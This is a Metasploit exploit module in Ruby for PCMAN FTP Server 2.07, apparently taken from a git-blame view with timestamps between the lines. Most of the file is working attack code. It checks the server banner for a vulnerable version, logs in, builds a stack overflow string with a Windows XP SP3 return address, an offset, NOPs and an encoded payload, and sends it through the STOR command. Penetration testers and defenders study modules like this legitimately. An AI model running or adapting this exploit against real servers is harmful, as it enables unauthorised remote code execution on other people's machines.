2013-09-16 19:38:00 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-09-16 19:38:00 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-09-20 16:58:53 +00:00
|
|
|
Rank = NormalRanking
|
2013-09-16 19:38:00 +00:00
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
include Msf::Exploit::Remote::Ftp
|
2013-09-16 19:46:13 +00:00
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow',
|
|
|
|
'Description' => %q{
|
2013-09-20 17:17:34 +00:00
|
|
|
This module exploits a buffer overflow vulnerability found in the STOR command of the
|
|
|
|
PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server. Please
|
|
|
|
note authentication is required in order to trigger the vulnerability. The overflowing
|
|
|
|
string will also be seen on the FTP server log console.
|
2013-09-20 16:58:53 +00:00
|
|
|
},
|
2013-09-20 17:17:34 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
2013-09-20 16:58:53 +00:00
|
|
|
'Christian (Polunchis) Ramirez', # Initial Discovery
|
|
|
|
'Rick (nanotechz9l) Flores' # Metasploit Module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVDB', '94624'],
|
|
|
|
[ 'EDB', '27703']
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
2013-09-20 17:17:34 +00:00
|
|
|
'VERBOSE' => true
|
2013-09-20 16:58:53 +00:00
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
2013-09-20 17:28:21 +00:00
|
|
|
'Space' => 1000,
|
|
|
|
'BadChars' => "\x00\xff\x0a\x0d\x20\x40",
|
2013-09-20 16:58:53 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows XP SP3 English',
|
|
|
|
{
|
|
|
|
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
|
2013-09-20 17:17:34 +00:00
|
|
|
'Offset' => 2011
|
2013-09-20 16:58:53 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jun 27 2013',
|
|
|
|
'DefaultTarget' => 0))
|
2013-09-18 00:42:01 +00:00
|
|
|
end
|
2013-09-16 19:38:00 +00:00
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
def check
|
2013-09-20 17:28:21 +00:00
|
|
|
c = connect_login
|
2013-09-20 16:58:53 +00:00
|
|
|
disconnect
|
|
|
|
|
2013-09-20 17:28:21 +00:00
|
|
|
if c and banner =~ /220 PCMan's FTP Server 2\.0/
|
|
|
|
# Auth is required to exploit
|
2014-01-21 17:07:03 +00:00
|
|
|
vprint_status("Able to authenticate, and banner shows the vulnerable version")
|
|
|
|
return Exploit::CheckCode::Appears
|
2013-09-20 17:28:21 +00:00
|
|
|
elsif not c and banner =~ /220 PCMan's FTP Server 2\.0/
|
2014-01-21 17:07:03 +00:00
|
|
|
vprint_status("Unable to authenticate, but banner shows the vulnerable version")
|
2013-09-20 17:28:21 +00:00
|
|
|
# Auth failed, but based on version maybe the target is vulnerable
|
|
|
|
return Exploit::CheckCode::Appears
|
2013-09-20 16:58:53 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
2013-09-20 03:35:08 +00:00
|
|
|
|
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
def exploit
|
2013-09-20 17:17:34 +00:00
|
|
|
c = connect_login
|
2013-09-20 03:35:08 +00:00
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
# Auth failed. The mixin should show the error, so we just bail.
|
2013-09-20 17:17:34 +00:00
|
|
|
return unless c
|
|
|
|
|
|
|
|
# Username is part of the overflowing string, so we need to account for that length
|
|
|
|
user_length = datastore['FTPUSER'].to_s.length
|
2013-09-20 03:35:08 +00:00
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
print_status("Trying victim #{target.name}...")
|
2013-09-20 17:17:34 +00:00
|
|
|
sploit = rand_text_alpha(target['Offset'] - user_length)
|
2013-09-20 16:58:53 +00:00
|
|
|
sploit << [target.ret].pack('V')
|
|
|
|
sploit << make_nops(4)
|
|
|
|
sploit << payload.encoded
|
|
|
|
sploit << rand_text_alpha(sploit.length)
|
2013-09-20 03:35:08 +00:00
|
|
|
|
2013-09-20 16:58:53 +00:00
|
|
|
send_cmd( ["STOR", "/../" + sploit], false )
|
|
|
|
disconnect
|
2013-09-18 19:12:35 +00:00
|
|
|
end
|
2013-09-20 16:58:53 +00:00
|
|
|
|
2013-09-17 00:43:10 +00:00
|
|
|
end
|